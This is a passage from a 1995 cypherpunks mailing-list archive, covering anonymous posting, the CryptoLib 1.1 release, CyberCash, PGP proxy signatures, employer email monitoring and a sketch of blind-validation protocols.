		Pro is to Con as progress is to congress





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Thu, 28 Dec 1995 23:07:23 +0800
To: fc@all.net
Subject: Re: another anonymous poster helping to destroy our rights
Message-ID: <9512280525.AA05396@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


You know, you are really starting to annoy me with this $*i+ about how anon 
users are destroying our rights by abusing theirs.  If you dont like it, 
ignore it.  but stop cluttering bandwith with your aimless complaints.  if you 
want cypherpunks to do somthing, SUGGEST somthing!  Stop wining and shut up!!

*sigh* its like people cannot handle their own problems today, except by 
bleating to the public.  I am requesting that anybody who has a problem with 
anon users TALK TO THE OWNER OF THE LIST.

Munster
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Thu, 28 Dec 1995 22:43:48 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: DejaNews and Alta Vista Search Tools, and Privacy Implications
In-Reply-To: <ad065486000210045fdd@[205.199.118.202]>
Message-ID: <Pine.OSF.3.91.951228002312.20470A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


	I was interested in your comments re DejaNews because of an
experience that I had about a month ago. I received mail from Rick
Broadhead, a co-author of the Canadian Internet Guide. He wanted to know
if I was the Tim Philp who wrote a computer column for the Brantford
Expositor and if so, would I be interested in reviewing his new books. 
	It seems that he got my name from a clipping service because I 
had mentioned his first book in my column. As I did not include my E-mail 
address in my column, he used DejaNews to search for Tim & Philp. Bingo! 
my name poped out from an old Cypherpunks list posting.
	In this case it was good as I was interested in talking to him, 
but the possibilities for privacy invasion are great. In any case, I got 
an article out of the experience. I think that it will be interesting 
when some of the future politicians who are now just kids playing on the 
Internet are presented with some of their juvenile rantings when they are 
40 years old and running for office. The mind boggles!

Regards, 
Tim Philp
Brantford, Ont.,
Canada

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Thu, 28 Dec 1995 22:32:28 +0800
To: cypherpunks@toad.com
Subject: New! Improved!  CryptoLib 1.1 now available.
Message-ID: <199512280557.AAA19317@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


[Note:  This is posted on behalf of Jack Lacy, whose news posting
software is hopelessly broken; please direct responses to him at
cryptolib@research.att.com.  Jack spent the better part of the last
two weeks getting a new release of CryptoLib out the door.  This version,
which should be stable for a while, fixes a few x86 problems, improves
the interfaces to some of the functions, and now allows you to use your
own random number generator to create key material.  If you don't
already have CryptoLib, be the first nerd on your block to get the
new release.  -matt]
========

Announcing CryptoLib - Release 1.1		12/21/95
   Jack Lacy, AT&T Bell Labs

CryptoLib is a portable and efficient library of primitives
for building cryptographic applications.  It runs under most versions
of Unix as well as DOS, Windows and Windows-NT (and 95).

We are pleased to make CryptoLib source code available without charge
to researchers and developers in the US and Canada.  (Because of export
restrictions on cryptographic software, we are only able to make the
software available within the US and Canada to US and Canadian citizens
and US permanent residents.)

CryptoLib is intended for research and experimental use, and is
distributed without warranty or support.  In particular, please
note the following license conditions:

 *              Copyright (c) 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software may be subject to export controls.
 *
 * NOTE:
 * Some of the algorithms in cryptolib may be covered by patents.
 * It is the responsibility of the user to ensure that any required
 * licenses are obtained.
 *
 * SOME PARTS OF CRYPTOLIB MAY BE RESTRICTED UNDER UNITED STATES EXPORT
 * REGULATIONS.
 *
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

The attached describes the library and some timing results.

To obtain source code send electronic mail to:

	cryptolib@research.att.com

with a statement of the following form:

	"I am a U.S. or Canadian citizen or a legal permanent resident of the
	U.S. and am aware that some parts of CryptoLib may be restricted under
	United States Export regulations and may be covered under various
	US and/or foreign patents.  I have read and understand the
	CryptoLib license."

	Name:
	Location:
	E-mail:
	Are you licensed to use the RSA patent?
	   If yes, give name of licensed organization:
		
===============================================================================

CryptoLib includes the following:

	arbitrary length bignums.

	bigmath package:
		bigAdd, bigSubtract, bigMultiply, bgiDivide,
		bigLeftShift, bigRightShift,
		bigAnd, bigOr, bigXor, bigCopy,
		Euclid's extended GCD,
		modular reduction and exponentiation

	crypto primitives
		DES and 3DES + modes
		Diffie-Hellman
		DSA (Signing and verification roughly equally efficient)
		El Gamal
		Rabin's scheme
		Random Number generation (PSEUDO and TRUE)
		MD[2,4,5]
		Prime generation
		RSA (provided only if you convince me that you have a license)
		SHA
		truerand (For Unix, NT and 95)
		quantization (Defense against Kocher's timing attack)
		quantized RSA, DSA and El Gamal private key operations.
		
	support functions
		asn1.c
		ioutils.c
		netIface.c

Some timing information:

All times assume 32X32 bit assembly of multiplication primitives.

bigPow times (a^b mod c with a,b,c the same length)

		512 bits	1024 bits
		--------	---------
bigPow		0.12s		0.72s		Sparc II Brickell bigpow
		0.43s		3.0s		Sparc II with asm (gcc)
		0.12s		0.78s		Sparc 10 with asm
		0.03s		0.17s		Sparc 10 with asm (Brickell)
		0.084s		0.45s		SGI Indigo (150MHz)
		0.109s		0.75s		100 MHz Pentium (gcc under DOS)

Strong Prime Generation -- ProbTestAttempts = 5
100 primes generated in each test.  Times below are:
(total test time)/100 = avg. time per prime generated.
Using Gordon's strong prime algorithm.

    256		512	1024	Machine
    ---		---	----	-------
    2.8s	24.0s	5.11m	Sparc II 
    .45s	2.7s	77s	100 MHz pentium
	


	RSA Times (64 bit public exponent, message encrypted is full length)
	---------

		512	768	1024 bits	machine
		---	---	---------	-------
encrypt		30ms	50ms	80ms		sparc II
decrypt		160ms	480ms	930ms

encrypt		15ms	33ms	56ms		100 MHz Pentium (Under NT)
decrypt		38ms	104ms	214ms


	DSA Times
	---------

		512	768	1024 bits	machine
		---	---	---------	-------
sign		99ms	166ms	216ms		sparc II (Brickell speedup)
verify		156ms	316ms	416ms

sign		21ms	38ms	49ms		100 MHz Pentium (Under NT)
verify		27ms	43ms	71ms






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 28 Dec 1995 22:23:43 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: Telcom bill report
In-Reply-To: <01HZBAWIUN7C8Y55DD@mbcl.rutgers.edu>
Message-ID: <199512280621.BAA27713@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


E. ALLEN SMITH writes:
> >> 	Here's the additional info from Reuters. As usual, Clinton is being a
> > coward. 
> 
> How do you figure ?
> 
> >    Vice President Gore says President Clinton will sign the bill. Before
> >    the agreement, the president had been threatening for months to veto
> >    the bill if Republicans in Congress did not retreat on a long list of
>                  ~~~~~~~~~~~
> >    issues. They retreated.
>              ~~~~~~~~~~~~~~
> 
> Clinton won on this. The Administration does not appear to have altered its
> position on this substantially.
> ----------
> 	I am calling Clinton a coward for giving in to the Christian Coalition
> and not vetoing this bill due to the censorship portion. He evidently decided
> that following his oath of office and upholding the First Amendment wasn't
> worth the "porn supporter" criticism Ralph Reed and his lot would direct his
> way.

Thanks ever so much for posting my non-list-relevant private mail to the list.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 28 Dec 1995 23:18:44 +0800
To: Lou Poppler <lwp@conch.aa.msen.com>
Subject: Re: Reputation capital: FIBS case study
In-Reply-To: <2sY4wMz2BcRC083yn@mail.msen.com>
Message-ID: <Pine.SUN.3.91.951228011912.27043B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Dec 1995, Lou Poppler wrote:

> The thorniest problem in our reputation economy continues to be the
> case of the player who drops out of a match when clearly losing, to avoid
> the decrement of his rating number (based on match results only, not on
> individual games).  [......stuff deleted...]  The best defense we have
> found against the match dropper is complaining in the newsgroup.

It seems to me the easiest way to solve this problem is to list for each 
player the number of games he dropped and didn't finish along with his 
rating and experience.  Why go for elaborate social solutions when a 
simple technical solution exists?

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 29 Dec 1995 05:15:43 +0800
To: cypherpunks@toad.com
Subject: VEL_cro
Message-ID: <199512281327.IAA15628@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-28-95. NYPaper reports on Communications Security
   Establishment's spying on citizens and allies, citing Jane
   Shorten's unzips (earlier bared here).

   Deputy PM Sheila Copps velcros fig leaf, "If, in fact,
   there has been illegal activity going on, we'll want to
   deal with that in as public a way as possible."

   VEL_cro







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Fri, 29 Dec 1995 02:43:02 +0800
To: Jim Thompson <jim@SmallWorks.COM>
Subject: Re: Cybercash security
In-Reply-To: <9512271711.AA13714@hosaka.smallworks.com>
Message-ID: <Pine.SUN.3.91.951228090339.23964B-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


The current plans include a way to link your CyberCash persona with
a bank account (DDA).  If you have done that and there is cash in
your CyberCash persona, you would be able to transfer it to the bank
account.  Using ACH, this operation typically happens overnight.

Donald


On Wed, 27 Dec 1995, Jim Thompson wrote:

> 
> The thing  I'd like to understand about Cybercash is... how do I get the
> cash back out of the system?
> 
> 

=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Fri, 29 Dec 1995 04:38:43 +0800
To: cypherpunks@toad.com
Subject: Proxy/Representation?
Message-ID: <199512281517.JAA13397@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


Caveat: I haven't yet looked through the archives, and it's late.  This
may sound even less intelligent than most of what's on the list as of
late (although what with the flamewars about I'm not sure if that's
possible).

Today I made a purchase at a local store using a personal check that wasn't
mine.  It very clearly wasn't mine (since the name on the check was Helen
and mine is Dave), but I am a duly appointed representative of Helen in
certain affairs.  Including this one, which was <blush> grocery shopping
</blush>.  (There are also other affairs, some with actual legal
consequences, and there is paperwork to that effect in a lawyer's safe
somewhere.)

The question is: how do the current software packages handle representatives
and proxies for a given is-a-person?  Using PGP as an example, I can't sign
a message with Helen's key.  And a message signed with my key won't hold
as much weight because "Dave" is not "Helen."  And if every message I send
on behalf of Helen has to be followed up by a message from Helen stating
"yes, Dave may act on my behalf for this instance" then much of the point
of the proxy process is lost.  (i.e. the reduction of Helen's workload etc.)

I'm sure that this has already popped up, so I'll just ask for pointers.

dave

----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Fri, 29 Dec 1995 02:43:06 +0800
To: weidai@eskimo.com (Wei Dai)
Subject: Re: Reputation capital: FIBS case study
In-Reply-To: <Pine.SUN.3.91.951228011912.27043B-100000@eskimo.com>
Message-ID: <9512281414.AA21403@all.net>
MIME-Version: 1.0
Content-Type: text


> On Wed, 27 Dec 1995, Lou Poppler wrote:
> 
> > The thorniest problem in our reputation economy continues to be the
> > case of the player who drops out of a match when clearly losing, to avoid
> > the decrement of his rating number (based on match results only, not on
> > individual games).  [......stuff deleted...]  The best defense we have
> > found against the match dropper is complaining in the newsgroup.
> 
> It seems to me the easiest way to solve this problem is to list for each 
> player the number of games he dropped and didn't finish along with his 
> rating and experience.  Why go for elaborate social solutions when a 
> simple technical solution exists?
> 
> Wei Dai

It seems to me that not finishing a game is the same as knocking over
the board.  It's a loss for the player waiting to move, and a non-game
for the other player.  This should solve the not-finishing-a-game
problem in short order.

For the problem of playing a fake unrated player, try variations on this
scheme.  Track the players each player plays and reevaluate all players
scores in relative terms.  To get a rating, players must engage in games
with enough other players to form a valid statistical basis - at least
100 games with rated players for 10% accuracy. 

	Start with provisional ratings in the 1-10 range based on
	comparrison with other players regardless of who.

	As players play other fully rated players, add a temporary
	rating based on relative performance and post both relative
	and 1-10 ratings.

	When players reach 100 games within the rated group, they get
	an official rating.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Fri, 29 Dec 1995 03:42:51 +0800
To: "Jason D. Livingood/WSC"@hks.net
Subject: Re: Employer Probing Precedents?
In-Reply-To: <199512272151.QAA05241@bb.hks.net>
Message-ID: <Pine.SUN.3.91.951228091552.4338d-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Dec 1995 Jason D. Livingood/WSC@hks.net wrote:

> To Whom It May Concern: I was
> curious as to where I might find some electronic freedom legal
> precedents.  If, for example, an employer was planning to probe file
> systems on PCs in the off-hours and employees began encrypting their
> hard drives, what legal precedents would support the employees or
> would support the employer in blocking the encryption?  Thanks for
> any info you can give me!!

You want to take a look at the ECPA (stands for Electronic
Communications Privacy Act--I think).  I don't have URLs handy, but it
should be easy enough to find via Alta Vista or Yahoo.

The way I understand it, though there are fairly strict limits on the
snooping your employer can do, you waive more or less all your privacy
rights if you sign a form saying you "consent" to the snooping.  Your
encryption question falls in kind of a grey area (most of the ECPA
deals with reading people's email, etc.), but it's probably covered in
there somewhere.

I have very strong feelings about this subject, but I'll keep them to
myself for now since I'm posting from work.  We were all informed a
week or two ago that Bear Stearns is now archiving every piece of
email coming into or leaving the company.

All I'll say here is that I disagree strongly with the views Tim May
posted about employees' property rights, etc. (though we agree on most
other things).

   --Dave.



--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mark@ausnetinfo.com.au (Mark)
Date: Thu, 28 Dec 1995 20:48:00 +0800
To: master@internexus.net (Laszlo Vecsey)
Subject: Re: Encrypted script - sort of
In-Reply-To: <Pine.LNX.3.91.951222230842.16815A-100000@micro.internexus.net>
Message-ID: <199512272234.JAA05530@ausnetinfo.com.au>
MIME-Version: 1.0
Content-Type: text


>> >A tale I hear is that when HP had to deliver operating system source to
>> >the french government they stripped all comments and changed all variable
>> >and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O).
>> >It still compiled but was 100% useless to human readers.
>
>A somewhat useful utility would be one that would compress C code into as 
>small space as possible, stripping out all spaces and making variable 
>names one character a piece when possible. And of course one to expand it 
>back into 'formatted' text, style could even be incorporated.
>
>I'm sure a Perl fanatic knows a quick solution... I'm always amazed at 
>how short Perl code is.. :)   Anyone care to take care of this utility?

press.c has been circulating for several years. I dont know of an unpress.c
but a beautifier would do the same thing.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Fri, 29 Dec 1995 03:43:37 +0800
To: "Jason D. Livingood/WSC"@hks.net, cypherpunks@toad.com
Subject: Re: Employer Probing Precedents?
In-Reply-To: <Pine.SUN.3.91.951228091552.4338d-100000@goya>
Message-ID: <Pine.SUN.3.91.951228093514.4338g-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Dec 1995, I wrote:

> All I'll say here is that I disagree strongly with the views Tim May
> posted about employees' property rights, etc. (though we agree on most
> other things).

Um, I meant employers' rights, obviously.

   --Dave.

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 29 Dec 1995 05:55:57 +0800
To: "David E. Smith" <dsmith@midwest.net>
Subject: Re: Proxy/Representation?
In-Reply-To: <199512281517.JAA13397@cdale1.midwest.net>
Message-ID: <199512281546.KAA09482@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"David E. Smith" writes:
> The question is: how do the current software packages handle representatives
> and proxies for a given is-a-person?  Using PGP as an example, I can't sign
> a message with Helen's key.

Nor should you be able to, actually.

When you sign a document on behalf of another and have "Power of
Attorney" in the paper world, you sign your own name and indicate that
you are signing on behalf of another, as in "David Smith for Helen
Smith".

The right way to do this in the digital world, IMHO, is to have a
standard for "Power of Attorney" documents, and for the entity
receiving something signed in your key that should be signed in
another person's key to also see the digitally signed power of
attorney document. Then the entity can check the signature on the
power of attorney was in Helen's key, and that the signed key in that
document was the key that signed the document signed by the "attorney".

> I'm sure that this has already popped up, so I'll just ask for pointers.

Actually, I haven't seen it mentioned before -- its only a subset of
other problems, though, like transient keys signed by longer term
keys. There should be some standardization in formats to handle this.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 29 Dec 1995 06:45:02 +0800
To: norm@netcom.com (Norman Hardy)
Subject: Re: URL for cypherpunks
In-Reply-To: <ad07a8b7010210043d01@DialupEudora>
Message-ID: <199512281556.KAA05580@homeport.org>
MIME-Version: 1.0
Content-Type: text


Norman Hardy wrote:

| I am putting up some solutions to the Garage Door problem that was
| discussed here perhaps a year ago. I would like to refer to the cypherpunks
| by URL. Are there currently any appropriate URLs ?

	Possibly the archive site at www.hks.net.  Tim May's
cypheromnicon.  

	mailto:cypherpunks@toad.com is NOT an appropriate pointer.
People who hand out pointers to mailing lists (other than the
subscribe address) are annoying fools, and encourage many innocent
fools to annoy many people.

	The csua.cs.bezerkely site is good, but hasn't been maintained
in a while.  (Unfortunately, there is enough cypherpunk & related
stuff out there that maintaining a really good site would be a full
time job.  Thats not a flame at any of the people out there who do good
work, just a wish for a really well organized www.cypherpunks.org
library & pointer list, should someone decide to pay for it. :)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 29 Dec 1995 07:13:58 +0800
To: dee@cybercash.com (Donald E. Eastlake 3rd)
Subject: Re: Cybercash security
In-Reply-To: <Pine.SUN.3.91.951228090339.23964B-100000@cybercash.com>
Message-ID: <199512281557.KAA05598@homeport.org>
MIME-Version: 1.0
Content-Type: text


Donald E. Eastlake 3rd wrote:

| The current plans include a way to link your CyberCash persona with
| a bank account (DDA).  If you have done that and there is cash in
| your CyberCash persona, you would be able to transfer it to the bank
| account.  Using ACH, this operation typically happens overnight.

	Wow.  Overnight clearing, bank interaction to load an account,
*and* identity linking!  Tell me again why this is better than FV?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Dec 1995 10:22:32 +0800
To: cypherpunks@toad.com
Subject: Laws, Politics, and Crypto Anarchy
Message-ID: <ad08136b06021004610e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(Those interested in discussions of Fermat numbers should skip this message.)


At 2:33 PM 12/28/95, David Mandl wrote:

>I have very strong feelings about this subject, but I'll keep them to
>myself for now since I'm posting from work.  We were all informed a
>week or two ago that Bear Stearns is now archiving every piece of
>email coming into or leaving the company.
>
>All I'll say here is that I disagree strongly with the views Tim May
>posted about employees' property rights, etc. (though we agree on most
>other things).

Yes, Dave and I agree about many things, but disagree about some things. I
would not like to have my e-mail into and out of Bear Stearns--were I an
employee--archived, monitored, and so forth, but I can certainly see why
they feel the need to do it (their liability for SEC violations, insider
trading, etc. is enormous). And were I an employer, I would not want some
government telling me I am forbidden to see if my employees are selling me
out over the Net. Just an example.

(Important Historical Note: The thing that got me interested in
cryptography, beyond my longstanding interest in the elegant mathematics of
public key cryptography, was an evaluation I did in 1987 of an "information
trading" business startup. My friend Phil Salin asked me to review his
business plan for a company which later became "American Information
Exchange" (AMIX). It allowed for people with information to sell to reach
the potential buyers, and for buyers to reach potential sellers. Like a
classified ad system. I thought about the system and said: "As an employer,
I could not let my employees use your system." Phil's reaction was "Huh?"
So I outlined a scheme whereby employees could begin "digital
moonlighting," not only selling their expertise to my competitors on
_company time_, but, infinitely worse, selling specific trade secrets to my
competitors! I cited to Phil the prospect of a "BlackNet" (yes, I named it
that in '87) which bought and sold corporate (and military, as I elaborated
on the concept) secrets through digital pseudonyms and Chaum-style mixes.
It became apparent to me what the Brave New World was going to look like.
And thus were the ur-cypherpunkish ideas born.)

It was not my intention to begin a debate about the nature of civil
liberties and the role of property. In fact, I don't think "libertarian"
debates are very useful here, for various reasons. (Though I don't go as
far as some in thinking that only pure crypto should be discussed....the
mix of crypto, programming, personal privacy, and technological empowerment
is what we talk about.)

Moreover, if political and economic issues never get discussed at all, some
folks may think that Cypherpunks are "obviously" supportive of things like
Data Protection Laws (which place limits on the compilation of dossiers and
files on people), Electronic Privacy Laws (which tell employers they cannot
snoop on employees), and Web Index Laws (which may limit the archiving and
indexing of Usenet and Web items).

In fact, I am against all of these laws.

However, I won't take the list's time now to explain why, as the political
discussion would take too long. Past articles have touched on these points,
and references are scattered throughout the Cyphernomicon.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Fri, 29 Dec 1995 08:44:05 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Cybercash security
In-Reply-To: <199512281557.KAA05598@homeport.org>
Message-ID: <Pine.SUN.3.91.951228113432.24703G-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Dec 1995, Adam Shostack wrote:

> Donald E. Eastlake 3rd wrote:
>
> [in answer to a question about how you would unload cash from a
>  Cybercash persona]
>
> | The current plans include a way to link your CyberCash persona with
> | a bank account (DDA).  If you have done that and there is cash in
> | your CyberCash persona, you would be able to transfer it to the bank
> | account.  Using ACH, this operation typically happens overnight.
> 
> 	Wow.  Overnight clearing, bank interaction to load an account,
> *and* identity linking!  Tell me again why this is better than FV?

You comment is sufficiently short and cryptic that it's a bit hard to
tell what your point is.  Different services are good for different
things.  Most of the merchant's signed up with CyberCash currently
sell hard goods that they phsically ship to you.  They have different
needs from the on-line information vendors that FV primarily serves
at this time.

But both CyberCash and, I understand, FV plan to expand their service
repertoire. 

If you want to use your credit card or bank account via CyberCash, you
need to go though an authentication step to link them.  If you don't
want to use a credit card or bank account, there is no requirement
to provide any real identity information when you set up a CyberCash
persona.

> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume

Donald
=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@utopia.hacktic.nl>
Date: Thu, 28 Dec 1995 23:40:30 +0800
To: cypherpunks@toad.com
Subject: Re: Announcing a new alpha release of premail
Message-ID: <199512281108.MAA08509@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


You sez:
:    This is to announce that premail version 0.42 is now available. It
: is a full alpha version of the new premail, containing all the
: features and functions planned for the production release.

[..]
:    If you are in the US or Canada, you can download premail now, from
: the premail Distribution Authorization Form:

:       http://kiwi.cs.berkeley.edu/premail-form.html

: Raph Levien


ftp://ftp.hacktic.nl/pub/replay/pub/incoming




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 29 Dec 1995 09:07:11 +0800
To: cypherpunks@toad.com
Subject: Re: URL for cypherpunks
In-Reply-To: <ad07a8b7010210043d01@DialupEudora>
Message-ID: <Pine.LNX.3.91.951228124406.262A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 27 Dec 1995, Norman Hardy wrote:

> I am putting up some solutions to the Garage Door problem that was
> discussed here perhaps a year ago. I would like to refer to the cypherpunks
> by URL. Are there currently any appropriate URLs ?

The most appropriate URL would be http://www.csua.berkeley.edu/cypherpunks/.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOLX0LZc+sv5siulAQH/pgP/bDZ1cy0YjaQeuusUwoAkikJhdKtjW8r5
eoJzRcGaaPd1wdOuVP3w4ab5D2+LMj/B765GumHV9okT/01yHVcratqVymDxkG05
TuE7RSpicusKfa/V0cpb6uZjqjbP8DPj9nEX5CU3YFMHzmFCGlRNjsYj6n4odpqW
XBQF/i1AHoU=
=UEJR
-----END PGP SIGNATURE-----


finger -l markm@omni.voicenet.com for PGP key  Key-ID: 0xF9B22BA5
Fingerprint: bd24d08e3cbb53472054fa56002258d5  http://www.voicenet.com/~markm/
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Fri, 29 Dec 1995 13:00:08 +0800
To: cypherpunks@toad.com
Subject: blind validation
Message-ID: <199512281849.MAA08259@proust.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


With all the recent Congressional activity, I've been thinking
about blind validation.  I know that other people (Chaum, for
one) have considered it, but it's not something that's talked
about online very often.  I'd like to kick off a discussion. 

I'm not good with protocols, there are almost certainly some
flaws in my thinking, and I'm not familiar with much of what
others have written on the subject.  Any pointers or constructive
criticism will be greatly appreciated.


I    Basicd

(Almost everyone here will be familar with this stuff;  I'm
including it for completeness.)

By "blind validation", I mean allowing someone to prove that
they're entitled to do something without making them tell you who
they are.

One obvious application of blind validation is to allow people to
download adult material anonymously while making sure that
children don't have access.  Other applications might be allowing
US citizens to download crypto software anonymously, or giving
members of a University community anonymous access to computing
resources that aren't available to the general public.

Why is blind validation desireable?  Without blind validation,
it's possible to build large and intrusive databases by linking
together the various fields on your ID cards, especially your
social security number.

When someone goes to a liquor store and shows an ID, he doesn't
just prove he's over 21.  He tells the clerk his name and
address, and whether or not he wears glasses, among other things.

This isn't a big problem when you're showing your ID to a clerk,
because the clerk is a human being who won't remember your name
or address.  But a computer has a very good memory, and groups of
computers are very good at assembling data from disparate
sources.  There are already online services that do this.  

Westdata, for example, offers a service that allows customers to
search a database assembled from a variety of sources -- census
information, real estate transactions, credit information,
telephone directories, and the like.  It's pretty easy to go
online and find someone's SSN, and once you've got that it's
possible to retreive all sorts of information.

This is why it's sensible for us to give out as little
information as is ncessary to accomplish whatever it is we're
trying to do.  That's what blind validation is all about.



II   Transferability -- blind validation's big problem.

Suppose Alice is allowed to do something.  How can we prevent her
from giving Carol the right to do it as well?

We can't.  This is true of any (ok, I don't know that -- most)
validation scheme, not just blind scehems.  I can give away a
unix account's login name and password, or even my PGP key.  

But conventional validation schemes have a big advantage over
blind ones:  in non-blind validation, users can be held
accountable for the people they let in.  If I give someone access
to my unix account and they post photoshop disk images to usenet,
I'll be held responsible.  I have a strong incentive to keep my
password secret.

If I can get blind validation to do something, I can't be held
accountable for my own actions, or for giving access to someone
else.  This fact drastically reduces the number of situations in
which blind validation is useful.

Here's a simple blind validation protocol that won't work:

1.   Alice generates a random number, blinds it, and sends it to
     Trent along with proof that she's validateable.

2.   Trent checks Alice's proof of validatability, signs her
     blinded number, then returns it to her.

3.   Alice unblinds her number and sends it to Bob, along with a
     request for a download.

Then Alice uses a remailer to post her number to usenet, along
with Trent's signature, and Bob has to let everyone who reads net
news download files.

Even a ticket based protocol similar to ecash won't work.  Let's
assume that Bob wants a ticket in exchange for a file, and that
he checks the tickets people give him for double spending. 
What's to stop Alice for getting a thousand tickets from Trent
and giving them to her friends?  Tickets aren't ecash -- they
don't cost anything.  Trent will give a ticket to anyone who can
prove he's validatable, and there's nothing preventing Alice from
